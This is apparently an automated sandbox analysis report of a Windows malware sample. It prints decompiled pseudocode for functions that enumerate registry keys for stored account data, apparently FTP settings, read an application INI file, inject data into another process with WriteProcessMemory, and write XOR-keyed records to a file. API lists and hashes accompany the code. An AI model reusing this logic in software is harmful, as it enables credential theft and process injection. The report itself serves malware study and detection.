									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E00407BC5(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E00407BC5(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E00407E4B(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x00407ebe
0x00407ec1
0x00407ec7
0x00407ede
0x00407ee3
0x00407ee7
0x00407eeb
0x00407eed
0x00407ef0
0x00407ef2
0x00408255
0x00408258
0x0040825f
0x00408262
0x00000000
0x00408264
0x00407ef8
0x00407efb
0x00407efe
0x00000000
0x00000000
0x00407f06
0x00407f0a
0x00407f1e
0x00407f1e
0x00407f20
0x00407f23
0x00407f26
0x00407f26
0x00407f2a
0x00407f2d
0x00000000
0x00000000
0x00407f33
0x00407f37
0x00407f3a
0x00000000
0x00000000
0x00407f40
0x00407f44
0x00000000
0x00000000
0x00407f4a
0x00407f4e
0x00000000
0x00000000
0x00407f54
0x00407f58
0x00000000
0x00000000
0x00407f5e
0x00407f62
0x00000000
0x00000000
0x00407f68
0x00407f6c
0x00000000
0x00000000
0x00407f72
0x00407f7d
0x00407f80
0x00407f83
0x00407f87
0x004081df
0x004081e3
0x004081e5
0x004081e8
0x004081eb
0x00000000
0x00000000
0x004081f3
0x004081f6
0x00000000
0x00000000
0x004081f8
0x00000000
0x004081f8
0x00407f90
0x00407f95
0x00407f9a
0x00407f9c
0x00000000
0x00000000
0x00407fa2
0x00407fa5
0x00407fa7
0x00407fc0
0x00407fc0
0x00407fc4
0x00407fc7
0x00407fdf
0x00407fdf
0x00407fe3
0x00407fe6
0x00407ffe
0x00407ffe
0x00408001
0x004080e5
0x004080ed
0x004080f5
0x004080ff
0x00408109
0x0040810c
0x00408110
0x00408113
0x0040811b
0x00408125
0x00408115
0x00408115
0x00408115
0x00408128
0x0040812c
0x0040812f
0x00408137
0x00408141
0x00408131
0x00408131
0x00408131
0x00408144
0x00408148
0x0040814b
0x00408153
0x0040815d
0x0040814d
0x0040814d
0x0040814d
0x00408160
0x00408163
0x00408165
0x00408206
0x0040820b
0x00408215
0x0040821a
0x0040821d
0x0040821f
0x00408229
0x0040822e
0x00408221
0x00408221
0x00408221
0x00000000
0x0040816b
0x0040816b
0x0040816d
0x004081d7
0x004081dc
0x004081dc
0x00000000
0x004081dc
0x00408182
0x00408184
0x00408187
0x00408189
0x00408233
0x00408234
0x0040823c
0x00408247
0x0040824c
0x00408251
0x00408251
0x00408251
0x00000000
0x00408251
0x00408194
0x00408199
0x0040819b
0x00000000
0x00000000
0x004081ab
0x004081b0
0x004081b2
0x00000000
0x00000000
0x004081c3
0x004081cd
0x00000000
0x004081cd
0x00408165
0x00408007
0x0040800c
0x00000000
0x00000000
0x00408021
0x00408037
0x0040803c
0x0040803e
0x00000000
0x00000000
0x00408044
0x0040804a
0x0040804a
0x0040804c
0x00408050
0x00408055
0x00408056
0x00408059
0x00408059
0x0040805e
0x00408064
0x00408067
0x0040807f
0x00408082
0x00408085
0x0040808b
0x0040808d
0x00000000
0x00000000
0x004080a5
0x004080ab
0x004080ad
0x004080b2
0x004080b2
0x004080b8
0x004080be
0x004080c1
0x004080c7
0x004080d1
0x004080d5
0x00000000
0x00000000
0x004080db
0x004080df
0x00000000
0x00000000
0x004080df
0x00000000
0x004080c1
0x00407feb
0x00407ff1
0x00407ff6
0x00407ff8
0x00000000
0x00000000
0x00000000
0x00407ff8
0x00407fcc
0x00407fd2
0x00407fd7
0x00407fd9
0x00000000
0x00000000
0x00000000
0x00407fd9
0x00407fb3
0x00407fb8
0x00407fba
0x00000000
0x00000000
0x00000000
0x00407fba
0x00000000
0x00407f26
0x00000000

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 079dff13de06a03271d108664618d9d81601a2398b82905e38c1be58f5e26f82
Instruction ID: 4920ff217b0b497269e5aed20bfaca108a0c9621a330f42038911c4a3688db1b
Opcode Fuzzy Hash: 079dff13de06a03271d108664618d9d81601a2398b82905e38c1be58f5e26f82
Instruction Fuzzy Hash: FFB1A271900609AADB10EF95CA41BFEB7B5BF44304F00442FE992B66D1DB78E985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9D8, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B9D8(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E004111B9( &_v32,  &_v32, 0, 8);
				_t65 = E004110D6(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E00411106(_v32);
					}
					return E004095BC(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E0040CA33(0x8a,  &_v260);
					E0040CA33(0x8b,  &_v88);
					E0040CA33(0x8c,  &_v132);
					E0040CA33(0x8d,  &_v68);
					E0040CA33(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E004150D3(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E004150D3(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E004150D3(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E0040B91E(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E00415189(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E0040CA33(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E00411DF9(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E004114FA(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E00411106(_v16);
					goto L22;
				}
			}

0x0040b9d8
0x0040b9d8
0x0040b9e6
0x0040b9ed
0x0040b9f7
0x0040b9fc
0x0040ba01
0x0040bbfa
0x0040bbfd
0x00000000
0x0040bc16
0x00000000
0x0040ba07
0x0040ba0c
0x0040ba1a
0x0040ba21
0x0040ba28
0x0040ba35
0x0040ba42
0x0040ba4f
0x0040ba5c
0x0040ba61
0x0040ba69
0x0040ba86
0x00000000
0x00000000
0x0040ba9f
0x0040baa2
0x0040bab1
0x0040bbdc
0x0040bbdf
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bbae
0x0040bbc2
0x0040bbd4
0x0040bab7
0x0040bab7
0x0040baba
0x0040bacc
0x0040bad1
0x0040bad7
0x0040baff
0x0040bb04
0x0040bb12
0x0040bb24
0x0040bb29
0x0040bb2f
0x0040bb55
0x0040bb5a
0x0040bb66
0x0040bb66
0x0040bb69
0x0040bb6f
0x0040bb70
0x0040bb75
0x0040bb78
0x0040bb7b
0x0040bb7c
0x0040bb7d
0x0040bb83
0x0040bb87
0x0040bb8c
0x0040bb92
0x0040bb97
0x0040bb9c
0x0040bb9f
0x0040bba9
0x0040bbab
0x0040bbab
0x0040bba9
0x0040bb9c
0x0040bb2f
0x0040bb04
0x00000000
0x0040bbda
0x0040bbda
0x00000000
0x0040bbda
0x0040bbe5
0x0040bbe5
0x0040bbe8
0x0040bbf5
0x00000000
0x0040bbf5

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000), ref: 0040BA7E
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 0040BAA9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040BBDF

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000), ref: 0040BBCC

Part of subcall function 004150D3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407A8E,?,?,00000104), ref: 00415169

Part of subcall function 00415189: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040F567,?,?), ref: 004151A1

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 671eb57819131fb81984c6b766bb8f179961b1d84778f9cf20c573c03219e79a
Instruction ID: 420c5219a80fdb0106543425625d3474a2ced6e903569ac9aba45d4f5ba30b35
Opcode Fuzzy Hash: 671eb57819131fb81984c6b766bb8f179961b1d84778f9cf20c573c03219e79a
Instruction Fuzzy Hash: 76511E72D00119ABDB11DBA5CD45AEFB7BCEB48704F100176F915F3291DB38AE858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF6C, Relevance: 6.2, APIs: 4, Instructions: 175
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BF6C(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E004111B9( &_v28,  &_v28, 0, 8);
				_t55 = E004110D6(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E0040CA33(0x97,  &_v180);
				E0040CA33(0x98,  &_v64);
				E0040CA33(0x99,  &_v76);
				E0040CA33(0x9a,  &_v52);
				E0040CA33(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E00411106(_v16);
					if(_v24 <= _t109) {
						return E00411106(_v28);
					}
					return E004095BC(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E004150D3(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E004150D3(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E004150D3(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E00411C55(_t113) > 0) {
										_t114 = E00415189(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E0040CA33(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E00411DF9(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E004114FA(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x0040bf6c
0x0040bf7a
0x0040bf81
0x0040bf8b
0x0040bf90
0x0040bf95
0x0040c18f
0x0040c18f
0x0040bfa0
0x0040bfae
0x0040bfbb
0x0040bfc8
0x0040bfd5
0x0040bfe2
0x0040c002
0x0040c162
0x0040c165
0x0040c16d
0x00000000
0x0040c186
0x00000000
0x0040c17c
0x0040c01b
0x0040c01e
0x0040c02d
0x0040c159
0x0040c15c
0x00000000
0x0040c033
0x0040c038
0x0040c038
0x0040c03b
0x0040c04d
0x0040c052
0x0040c058
0x0040c07b
0x0040c080
0x0040c086
0x0040c094
0x0040c0a6
0x0040c0ab
0x0040c0b1
0x0040c0b7
0x0040c0c0
0x0040c0d5
0x0040c0da
0x0040c0e6
0x0040c0e6
0x0040c0e9
0x0040c0ec
0x0040c0ed
0x0040c0f2
0x0040c0f5
0x0040c0f8
0x0040c0f9
0x0040c0fa
0x0040c100
0x0040c109
0x0040c10f
0x0040c114
0x0040c119
0x0040c11c
0x0040c126
0x0040c128
0x0040c128
0x0040c126
0x0040c119
0x0040c0c0
0x0040c0b1
0x0040c086
0x0040c13f
0x0040c14f
0x0040c157
0x00000000
0x0040c157

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000), ref: 0040BFFA
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 0040C025
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040C15C

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000), ref: 0040C149

Part of subcall function 004150D3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407A8E,?,?,00000104), ref: 00415169

Part of subcall function 00415189: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040F567,?,?), ref: 004151A1

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 15f9a1db8937c1196fc4b3d57c6b0e9a55096b2e3fd18cfd7e186a418d796e5f
Instruction ID: 5d42023a5feaf14aa7f1573eee98893e4fd7bb53c534574181b2dbb78230a309
Opcode Fuzzy Hash: 15f9a1db8937c1196fc4b3d57c6b0e9a55096b2e3fd18cfd7e186a418d796e5f
Instruction Fuzzy Hash: 37513376D00109EBDB10EBA5CD85AEFB7BDEF48304F100276B505F72A1D7389A868B64

Uniqueness

Uniqueness Score: -1.00%

Function 00418993, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00418993(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E0040CA33(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E00416745( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E0040CA33(_t36,  &_v112);
						_t33 = E00416745( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E0040CA33(_t42,  &_v60);
								_t44 = 0x2e;
								E0040CA33(_t44,  &_v84);
								_t46 = 0x2f;
								E0040CA33(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E00411DF9( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E00418B1A(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E00416745( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x004189a6
0x004189a7
0x004189ac
0x004189ba
0x004189c2
0x004189d2
0x004189d9
0x004189e4
0x004189e5
0x004189fa
0x00418a01
0x00418a0e
0x00418a17
0x00418a22
0x00418a23
0x00418a2d
0x00418a2e
0x00418a38
0x00418a39
0x00418a3e
0x00418a42
0x00418a46
0x00418a4a
0x00418a4d
0x00418a4e
0x00418a51
0x00418a5b
0x00000000
0x00000000
0x00418a71
0x00418a77
0x00418a7c
0x00000000
0x00000000
0x00418a9d
0x00418aa5
0x00418b06
0x00418b06
0x00418b0d
0x00000000
0x00000000
0x00000000
0x00418b0d
0x00418aa7
0x00418ab4
0x00418aca
0x00418acd
0x00418af4
0x00418afa
0x00418afd
0x00418b04
0x00000000
0x00000000
0x00000000
0x00418b04
0x00418ae3
0x00418ae8
0x00418aea
0x00000000
0x00000000
0x00418aec
0x00000000
0x00000000
0x00000000
0x00000000
0x00418ab6
0x00418ab6
0x00418aba
0x00418abe
0x00418abf
0x00418abf
0x00418ac2
0x00418ac5
0x00000000
0x00418ab6
0x00000000
0x00418b13
0x00418a17
0x00418a01
0x004189d9
0x00418b17

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 004189BA

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00418A0E
GetPrivateProfileIntW.KERNEL32 ref: 00418A71
GetPrivateProfileStringW.KERNEL32 ref: 00418A9D

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: 5812421822c77b917748efa40cc435aee642f8ca52f10767d5ed30df36ad7361
Instruction ID: fcf63ee04f8320bf3a7b3044fabee55ea7c6d46efa789f27aa1a1081b66f9293
Opcode Fuzzy Hash: 5812421822c77b917748efa40cc435aee642f8ca52f10767d5ed30df36ad7361
Instruction Fuzzy Hash: A0419572A04218AADF20E7A4DC85EDE777DAF05354F0001A7F614F71D1EB78AE898B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406A38, Relevance: 6.1, APIs: 4, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00406A38(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				intOrPtr _t25;
				void _t26;
				signed int _t29;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t25 =  *0x41e5a4; // 0x400000
				_t26 = E00415819(_t25, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_t29 =  *0x41e590; // 0x1
					_a8 = _a8 | _t29 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x41e590 -  *0x41e5a4 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x41e5a4 -  *0x41e5a4 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0040619A(0x41ea9c, _t51, _v12,  *0x41ea9c) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0040619A(0x41eaa0, _t51, _v12,  *0x41eaa0) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x00406a38
0x00406a38
0x00406a3d
0x00406a44
0x00406a4b
0x00406a50
0x00406a65
0x00406a72
0x00406a74
0x00406a74
0x00406a78
0x00406a80
0x00406a83
0x00406aa5
0x00406aa7
0x00406aa7
0x00406ac6
0x00406ac8
0x00406ac8
0x00406ae1
0x00406ae3
0x00406ae3
0x00406afc
0x00406afe
0x00406afe
0x00406b04
0x00406b1b
0x00406b06
0x00406b10
0x00000000
0x00406b10
0x00406a52
0x00406a52
0x00406a52
0x00406a52
0x00406b20

APIs

Part of subcall function 00415819: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00415835

DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,0040CC1F,?,00000000,?), ref: 00406A6A
WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,0040CC1F,?,00000000,?,?,0040CDAD,?), ref: 00406AA1
WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,0040CC1F,?,00000000,?,?,0040CDAD,?,?), ref: 00406AC1
VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,0040CC1F,?,00000000,?,?,0040CDAD), ref: 00406B10

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID:
API String ID: 2215616122-0
Opcode ID: 2d200f96fa126b96dbe5c9355003f0b97c7b7ee4852bfdf49b0a883264799d1e
Instruction ID: 3b5328fe60e4150a9166694667562aacbe6a4c14233b6b8fd088e3fdc1c7bec4
Opcode Fuzzy Hash: 2d200f96fa126b96dbe5c9355003f0b97c7b7ee4852bfdf49b0a883264799d1e
Instruction Fuzzy Hash: 0D21D276604108BEDF01DBD5CC81EEE7F79EF59348F0080A9FA06F6151E33599559B28

Uniqueness

Uniqueness Score: -1.00%

Function 004173BA, Relevance: 6.1, APIs: 4, Instructions: 86commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00401528,00000000,00004401,00401518,?,?,?,?,?,?,?,?,?,00409F0E,?,?), ref: 004173E0
VariantInit.OLEAUT32(?), ref: 0041742C
SysAllocString.OLEAUT32(?), ref: 0041743C
VariantClear.OLEAUT32(?), ref: 00417475

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCreateInitInstanceString
String ID:
API String ID: 3126708813-0
Opcode ID: f0a001ec3ed2332c28c346bda5c71fa4eafb9394e8d579e9a6aef066daeaa89d
Instruction ID: 4487217032a1bb2d3e111d82d23ba0d69d22c1785919c43567b51aea64ed2e0d
Opcode Fuzzy Hash: f0a001ec3ed2332c28c346bda5c71fa4eafb9394e8d579e9a6aef066daeaa89d
Instruction Fuzzy Hash: 03216071904228AFCB11DBE4CCC8EEF7BB8EF09751F1045A5F906EB251C6799940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00416EDE, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416EDE(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E004161C4( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E004161A4( *__esi, 0, 0, 2) != 0) {
						_t29 = E004161C4( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E004111B9( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E004161A4( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E004161A4( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x00416ede
0x00416ede
0x00416eef
0x00416ef2
0x00416efa
0x00416eff
0x00416f04
0x00416f0a
0x00416f25
0x00416f2a
0x00416f2f
0x00416f35
0x00416f3e
0x00416f50
0x00416f63
0x00416f95
0x00416f9c
0x00416f86
0x00416f86
0x00416f86
0x00416f63
0x00416fa4
0x00416fb3
0x00416fb3
0x00416f0a
0x00416fbe

APIs

Part of subcall function 004161C4: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 004161D9

Part of subcall function 004161A4: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00416EB7,?,00000000,00000000,00000000,00000000), ref: 004161B6

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00416F5F
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00416F78
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00416F9C
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00416FA4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

